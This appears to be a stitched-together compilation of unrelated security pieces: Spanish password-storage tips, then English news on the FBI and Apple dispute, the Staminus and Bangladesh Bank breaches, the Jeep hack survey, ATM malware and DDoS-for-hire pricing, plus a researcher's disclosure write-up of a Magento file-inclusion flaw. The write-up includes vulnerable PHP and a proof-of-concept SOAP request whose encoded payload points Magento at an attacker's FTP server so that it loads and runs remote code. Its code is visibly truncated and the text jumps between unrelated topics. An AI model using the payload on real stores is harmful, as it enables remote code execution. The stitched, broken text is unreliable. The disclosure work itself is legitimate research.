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Seguridad de las contraseñas es un tema muy importante, que recientemente se ha vuelto muy popular. Aunque ciertamente no es la única cosa que usted necesita para hacer su aplicación segura, es una de esas medidas de seguridad que todos los desarrolladores consciente de la seguridad deben implementar. Según experiencia de auditoría de base de datos, en la implementación de una aplicación, le sugerimos que haga lo siguiente:

Recomendación para proteger las contraseñas en base de datos de una aplicación

  • Cifrar toda la comunicación con los clientes. Si usted está comunicando utilizando el protocolo TCP, debe usar TLS; si está comunicando mediante UDP, debe usar DTLS. Enviar contraseña a través de una conexión sin protección es algo que nunca debe hacer.
  • Almacenar el hash de contraseña junto con la salt correspondiente. Mantener sólo contraseñas cifradas puede resultar en violación de la seguridad fácilmente  ya que ataque de diccionario puede romper hashes sin salt según empresa de auditoría de base de dato. Para evitar esta situación debe usar ‘salted hashes’. Salt y contraseña se concatenan a través de funciones de hash para dar como resultado ‘salted hash’. Salt debe ser diferente para cada usuario para qué hashes serán diferentes para diferentes usuarios, incluso si sus contraseñas son exactamente iguales. Además  los ataques rainbow tables no funcionan bien sobre salted hash.
  • Implementar funciones de hash en el lado del servidor por aplicaciones web basadas en navegador. La configuración del lado del servidor de funciones hash deba ser lo más lenta posible. Según recomendaciones de los expertos de auditoría de base de datos, podría usar funciones Hash como de Scrypt, Argon2 en el lado del servidor.
  • Implementar funciones de hash en el lado del servidor y el cliente por aplicaciones que deben ser instadas. Implementar funciones de Cliente + Servidor hash. La configuración tanto del lado del cliente y del lado del servidor de funciones hash deba ser lo más lenta posible. Según recomendaciones de los expertos de auditoría de base de datos, podría usar funciones hash como de Scrypt, Argon2 en el lado del cliente y del lado del servidor.
  • Establecer la longitud mínima de la contraseña por lo menos 8 y dejar una longitud máxima de la contraseña.
  • Prohibir las contraseñas que son bien conocidas en las bases de datos de contraseñas para prevenir ataques de diccionario.
  • Implementar políticas de cambios de contraseña cada 2 meses.
  • Implementar la autenticación de dos factores, al menos para los usuarios privilegiados, como administrador.
  • Implementar un límite de sesión de entrada para controlar el número de intentos de inicio de sesión fallido y bloquear direcciones Ip. El segundo límite puede ser un límite por usuario-por-IP, y esto tiene que ser mayor que el primero.
  • Tener políticas de auditoría de base de datos e implementar recomendaciones de los expertos de seguridad cibernética.

FBI Might Go After iOS Source Code If Apple Doesn’t Build a Backdoor

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DOJ goes for more aggressive tactic in San Bernardino case.

The Department of Justice is certainly not going to back down in the San Bernardino iPhone saga and there’s now evidence that the feds could even force Apple to provide the full source code of iOS should the company refuse to build a backdoor.

Specifically, if Apple does not want to create custom software that would help the FBI unlock an iPhone used by one of the San Bernardino attackers and the company loses in court, the Department of Justice might request Cupertino to provide the source code of the operating system instead.

“No backdoor? Ok then, you must give us the private key”

The Guardian reports that the Department of Justice has already hinted at this possibility in a recent formal response to Apple, explaining that if the company refuses to build software that could provide it with access to the iPhone, there’s no other way around than to ask for the full source code of the OS.

“The FBI cannot itself modify the software on Farook’s iPhone without access to the source code and Apple’s private electronic signature,” the Department of Justice explains, hinting at what’s to come in case Cupertino refuses to go the backdoor way.

Previously, Apple CEO Tim Cook explained that he doesn’t want the same company engineers who worked on improving iPhone security in the last few years to go in reverse and now break into their own software, so the FBI says that handing over private key would allow its own security researchers to do the whole job.

“The government did not seek to compel Apple to turn those over because it believed such a request would be less palatable to Apple. If Apple would prefer that course, however, that may provide an alternative that requires less labour by Apple programmers,” the Department of Justice added.

Certainly, Apple will clearly reject such a possibility because providing the FBI with the iOS private key would create major risks for everyone. With such information, the FBI could even deliver custom software updates to iPhones in the United States without customers specifically knowing where it comes from, thus getting full control over any device at any moment.


Hackers Breach DDoS Protection Firm Staminus

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KKK website data also stolen in the attack. Unknown hackers have breached the servers of DDoS protection firm Staminus, stealing sensitive data from its database, and dumping it online.

Staminus is a US-based company that’s specialized in providing DDoS protection systems. Besides its main offering, the company also provides a service called Intreppid, which delivers dedicated virtual private servers, with built-in DDoS protection features.

Hackers brought down Staminus’ entire network

The Staminus data breach happened yesterday after hackers managed to infiltrate the company’s server backbone, and have proceeded to reset them to factory settings, effectively bringing down the company’s entire network.

The hackers also stole Staminus’ database and dumped it online using the Hastebin anonymous text sharing portal.

After the company brought down their entire network yesterday at 7:30 AM PST, news about the breach made its way to Reddit, along with links to the Hastebin dump.

Before the Reddit thread revealed the data breach, Staminus posted the following comment on Twitter: “Around 5am PST today, a rare event cascaded across multiple routers in a system wide event, making our backbone unavailable.”

The company has not yet acknowledged the incident but has already started restoring service to its network.

Hackers stole credit card information

The Hastebin link contains a classic “ezine” that details what the attackers managed to access. The hackers said they were able to steal Staminus’ main database, the database of its Intreppid service, and the database of one of Staminus’ clients, the Ku Kluk Klan.

The hackers announced the breach with a dose of irony. The e-zine started with tips on how to run a security company, that also hold clues to how the attackers got access to the servers, what they stole, and why their breach was so successful.

    ~ Use one root password for all the boxes
~ Expose PDU's to WAN with telnet auth
~ Never patch, upgrade or audit the stack
~ Disregard PDO as inconvenient
~ Hedge entire business on security theatre
~ Store full credit card info in plaintext
~ Write all code with wreckless abandon

At the end of the ezine, the hackers posted Tor network links to all the data. Softpedia has not downloaded all files, but from the few we were able to grab because of Tor’s insanely slow speed, they appear to be valid.

Staminus clients are advised to look into credit card monitoring services, and also reset all their account passwords once the service is fully operational once again.

Other information that appears to be in the leaked data includes customer support tickets, server log data, chat logs, and the source code of some of the company’s services.

Softpedia has contacted Staminus for comment and would also like to thank Reddit user reefine for his help.

Data dump links at the end of the ezine [edited by Softpedia]

Data dump links at the end of the ezine [edited by Softpedia]

Bangladesh says hackers stole $100 Million from its US Federal Reserve account

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Unknown hackers have stolen more than $100 million from the Bangladesh Bank account at the US Federal Reserve Bank.

According to Bloomberg, the Bangladesh’s Finance Minister Abul Maal Abdul Muhith is accusing the U.S. Federal Reserve for the theft of at least $100 million stolen from the Bangladesh’s account. Bangladesh is threatening the US for a legal fight to retrieve the funds, explained Muhith in a press conference held in Dhaka on Tuesday. The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

“We kept money with the Federal Reserve Bank and irregularities must be with the people who handle the funds there,” Muhith said. “It can’t be that they don’t have any responsibility.”

While the central bank of Bangladesh is blaming Chinese hackers, the Federal Reserve is denying the security breach of security took place.

On Monday, a spokeswoman for the US Federal Reserve Bank of New York confirmed there was no evidence of a security breach, neither that the Bangladesh Bank account had been hacked.

Federal reserve bank hacking

The Fed spokeswoman clarified that every payment follows standard protocols and is authenticated by the SWIFT message system used by financial institutions

“To date, there is no evidence of any attempt to penetrate Federal Reserve systems in connection with the payments in question, and there is no evidence that any Fed systems were compromised,” said New York Fed spokeswoman Andrea Priest.

Currently, the US Fed and the Bangladesh Government are investigating the incident.

The Bangladesh’s central bank has about $28 billion in foreign currency reserves, according to the country’s Prothom Alo newspaper, at least 30 transfer requests were made on February 5 using the Bangladesh Bank’s SWIFT code. Five transfers were successfully completed.

How is possible?

Difficult to say because there aren’t details on the event. It is likely hackers breached Bangladesh Bank in early February stealing credentials for payment transfers, then they used the credentials to order transfers out of a Federal Reserve Bank of New York account held by Bangladesh Bank.

Anyway it is a complex hack, attackers had a deep knowledge about Bangladesh Bank’s procedures for ordering transfers, likely they spied on Bangladesh Bank staff to gather the information.

Other incidents involved the US Feds in the past, in 2014 a British citizen was accused of hacking its servers and leaking sensitive data.


Only One in 4 Americans Remembers Last Year’s Epic Jeep Hack

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WHEN SECURITY RESEARCHERS Charlie Miller and Chris Valasek remotely hacked the Jeep I was driving last summer, video footage of their demonstration aired on every major TV news network. Jeep immediatelyrecalled 1.4 million vehicles, and Congress even followed up by introducing abill seeking to regulate automotive cybersecurity. None of that, it seems, was enough to make a lasting impression on the overburdened mind of the average American driver.

At the RSA security conference last week, automotive consumer research firm Kelley’s Blue Book released the results of a survey on car hacking that revealed just how short Americans’ attention spans seem to be when it comes to the security of their cars and trucks: Only one in four respondents to the survey could remember an incidence of car hacking occurring in the last year. That’s a dramatic drop from just a few months earlier, when a survey by the same firm performed just days after WIRED’s car hacking exposé in July found that 72 percent of goldfish—er, consumers—were aware of the Jeep hack when asked about it specifically.

That bizarrely steep drop in awareness is a troubling finding: Though Miller and Valasek’s research resulted in a formal recall and a software update to both the vulnerable vehicles and the Sprint network used to attack them, they had also aimed to raise public pressure on carmakers to secure their vehicles from digital attacks. “If consumers don’t realize this is an issue, they should, and they should start complaining to carmakers,” Miller told me at the time. “This might be the kind of software bug most likely to kill someone.”

But American drivers may be overwhelmed with the unending string of automotive industry scandals of the last few years, says Kelley’s Blue Book analyst Karl Brauer. “There’s definitely what we call ‘recall fatigue,’” says Brauer. He points to the Takata airbag recall, Toyota’s unintended acceleration issue, and Volkswagen’s emissions-cheating scandal, all of which have vied for the American driver’s attention. “There are so many headlines relating to automobiles that it creates a river of negative car information,” he adds. “It leads to a certain amount of purposeful apathy and ignorance of the circumstances.”

Of the 26 percent of respondents who did remember a recent vehicle hack, only 31 percent remembered it being a Jeep, with 21 percent attributing the incident to a Honda and 18 percent remembering the victim vehicle to be a BMW. (The only incident that might vaguely explain either of those responses seems to be hacker Samy Kamkar’s discovery that his remote vehicle unlocking tool OwnStar also worked on BMW vehicles.)

Respondents also downplayed the threat car hacking represented. On a list of 10 possible vehicle-related risks ranging from road rage to drunk driving, car hacking rated second to last, just above carjacking, with distracted driving named as the biggest risk.

But the same respondents seemed more concerned about the cybersecurity of the next automobile they own. About 63 percent of them said the threat of cybersecurity vulnerabilities would have some impact on their next vehicle purchase, and a total of 31 percent said it would have either a “moderate” or “huge” impact.

On that point, car hackers Miller and Valasek agree. They say their demonstration was largely meant to prevent a future problem, not scare drivers with a present-day one. “One of the reasons Chris and I are working on this problem now is to raise attention and get car companies working on securing vehicles now, rather than wait for a real problem to occur,” Miller wrote in a note to WIRED. “I’m not worried about my car being hacked today…but I am worried that car companies aren’t taking this issue seriously when designing cars for five years down the road.”


ATM Malware Gang Member Escapes Police Custody, Hollywood Style

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ATM robber escapes by cutting hole in prison fence. A suspect arrested at the start of January for being part of an international cybercrime group that robbed ATMs with malware has escaped from a Romanian prison earlier today.

The suspect, Renato Marius Tulli, 34, was being held at Police Precinct 19 in Bucharest, Romania’s capital, after being arrested on January 5, 2016.

Authorities are saying that Tulli and a second suspect escaped while they and other prisoners were out in the precinct’s yard, taking their daily outdoor break.

Suspects cut the fence and made a clean getaway

The two managed to cut the police precinct’s fence and then escaped without being noticed by the two officers that were keeping watch.

The second suspect that got away with Tulli is named Grosu Gostel, 38, a man held on robbery charges. The two police officers that were on duty are now investigated on charges of negligence.

The suspects have broken out on Sunday, March 6, 12:30 PM, local time, and police forces started a city-wide manhunt in search of the two.

Tulli is a suspect in an Interpol investigation

Tulli was arrested together with seven other suspects as part of a joint Europol, Eurojust, and DIICOT investigation. The group he was part of was specialized in robbing NCR-based ATMs.

They operated only on weekend nights, in multiple stages. First someone would stake out possible targets. Then, in the second stage, a second group would come and insert a CD containing the Tyupkin malware in the CD-ROM slot on the back panel of NCR ATMs.

The malware allowed the group to take out small amounts of money, and then it would self-delete. The criminals operated between December 2014 and October 2015 in countries such as Romania, Hungary, the Czech Republic, Spain, and Russia. Europol estimates the group caused damages to financial institutions of around €200,000 / $217,000.


Hacking Magento eCommerce For Fun And 17.000 USD

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Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding…


A couple of months later, in February 2015, there was a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I’d never thought I’d receive: 8,000$ and9,000$. Both of the vulnerabilities were discovered in February 2015, however I decided to report only a “potential Remote Code Execution” at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn’t a “real” security issue. I was wrong (again!)…

• Autoloaded File Inclusion in SOAP API (CVE-2015-6497)

There is a class of vulnerabilities that might affect certain PHP applications which uses an “exploitable” autoloading mechanism. The “Autoloading Classes” feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn’t been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition. While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list:

  • class_exists()
  • interface_exists()
  • method_exists()
  • property_exists()
  • is_subclass_of()

So, when user-controlled input (tainted data) enters one of these sensitive sinks there’s a chance for the application to be vulnerable to an “Autoloaded File Inclusion” attack. Let’s see a simple example of vulnerable code:

/* Some code... */
function __autoload($class_name)
   include $class_name . '.php';
if(isset($_GET['class']) && class_exists($_GET['class']))
   $myObject = new $_GET['class'];
   die('No class found');
/* Some code... */

In this example an attacker controls a class name via the GET parameter “class”, which is first used with the class_exists()function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these:

In the first case the autoloader will try to include and execute the PHP code located at, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located into the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname’s prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code.

According to the official PHP documentation “a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores”. That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names. This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that’s probably one of the reasons why Magento’s security engineers have undervalued this issue.

Magento Vulnerability

The vulnerability in Magento is caused by the code that handles the “catalogProductCreate” SOAP API call. The vulnerable code is located into the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script:

public function create($type, $set, $sku, $productData, $store = null)
    if (!$type || !$set || !$sku) {
    /** @var $product Mage_Catalog_Model_Product */
    $product = Mage::getModel('catalog/product');
    if (!property_exists($productData, 'stock_data')) {
        //Set default stock_data if not exist in product data
        $_stockData = array('use_config_manage_stock' => 0);

This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists()function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there’s only one autoloader function registered, that is theVarien_Autoload::autoload() method:

public function autoload($class)
    if ($this->_collectClasses) {
        $this->_arrLoadedClasses[self::$_scope][] = $class;
    if ($this->_isIncludePathDefined) {
    } else {
        $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class)));
    $classFile.= '.php';
    //echo $classFile;die();
    return include $classFile;

In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the$productData parameter from the SOAP request, which after some replacementes and a “.php” string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code. There are some conditions which should be met to exploit this vulnerability:

  • an API user account with privileges to create a catalog product is required;
  • in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process;
  • in order to include arbitrary files from remote locations the “allow_url_include” directive must be set to On;
  • in case the “allow_url_include” directive is set to Off it might still be possible to include files from remote locations using thessh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging theexpect:// wrapper (which requires the Expect extension to be installed).

NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243).

Proof of Concept

A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability:

POST /magento/index.php/api/v2_soap HTTP/1.0
Host: localhost
Content-Length: 804
Connection: close

<?xml version=”1.0″ encoding=”UTF-8″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”” xmlns:ns1=”urn:Magento” xmlns:xsd=”” xmlns:xsi=”” xmlns:SOAP-ENC=”” SOAP-ENV:encodingStyle=””>
<sessionId xsi:type=”xsd:string”>VALID_SESSION</sessionId>
<type xsi:type=”xsd:string”>simple</type>
<set xsi:type=”xsd:string”>4</set>
<sku xsi:type=”xsd:string”>test</sku>
<productData xsi:type=”xsd:base64Binary”>ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData>
<storeView xsi:nil=”true”/>

The “productData” parameter has been encoded in base64 within the SOAP request, and the decoded string is the following:

This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution.

Responsible Disclosure Timeline

As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable. The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following:

We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report.

On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition and Enterprise Edition that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25:

Hello Egidio, Congratulations!
Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000.

I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015.

• Information Disclosure in RSS Feed (CVE-2016-2212)

After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered “Why don’t try to report this as well? Maybe I’m missing something out and I wrongly believe this isn’t a real security issue”. Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!! :)

I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day:

Hello Egidio,
Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers.

After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171″. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016:

Hello Egidio, Congratulations!
Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000.

I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update:SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you?


Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progresses. However, what really disappoints me is that my vulnerabilities seem to be quite critical, specially considering they’re the only two classes of security bugs they’re willing to pay up to 10,000$ under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and underevaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never noticed their advisories with my name and the vulnerabilities I reported, and never claimed my bounties for such findings?


Can You Guess How Much a Russian DDoSer Makes per Day?

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Security firm tracked DDoS botnet for three months. By leveraging their access to Russian underground hacking forums and their powerful DDoS botnet surveillance platform, analysts from Arbor Networks have managed to estimate how much a regular DDoS booter makes per day from one single botnet.

For their experiment, Arbor chose a random threat actor who went under the name of Forceful. By tracking his ads across different forums, Arbor experts managed to connect his DDoS-for-hire services with the activity of a previously known botnet, activating from the kypitest[.]ru C&C (command-and-control) server.

Forceful had created a custom piece of malware, which he used to infect victims and add them to his botnet, which he was controlling through the G-Bot DDoS botnet Web panel, operating from the above domain.

Security researchers tracked Forceful’s botnet across time

One of the neat features of being a multi-national corporation is the advantage of having cool toys to debug malicious activity that happens on the Internet. In Arbor’s arsenal of tools, there is the BladeRunner platform, a monitoring system that watches and logs DDoS attacks, recording their origin and duration.

Using logs from the BladeRunner platform, Arbor’s researcher managed to identify many of the attacks sent out from Forceful’s kypitest[.]ru platform, which first became active on July 9, 2015.

This information allowed Arbor to take the Forceful price list and compare it to the number and length of attacks that originated from his infrastructure, providing a basic estimate for the hacker’s daily revenue.

Discrepancy between the cost to hire and the cost to fend off DDoS attacks

On the hacking forums he advertised on, Forceful was peddling his service for $60 for day-long attacks, $400 for week-long attacks, and was also offering a 10% discount on orders above $500, and a 15% price cut on orders above $1,000.

Arbor discovered 82 attacks from July 9, 2015 to October 18, 2015, which added up to $5,408. This gives a mean estimated revenue per attack of $66 and an average estimated revenue per day of $54.

According to a previous report issued at the end of January, Arbor also estimated that it costs a company around $500 per minute to fend off attacks.

This shows why DDoS attacks are so effective in blackmail campaigns, where someone could spend just a few hundreds of dollars per week to hire a DDoS botnet, but extort tens of thousands from companies that cannot fend off attacks and end up paying before more damage is done to their business.

One of Forceful’s ads for his botnet (via Google Translate)

One of Forceful's ads for his botnet (via Google Translate)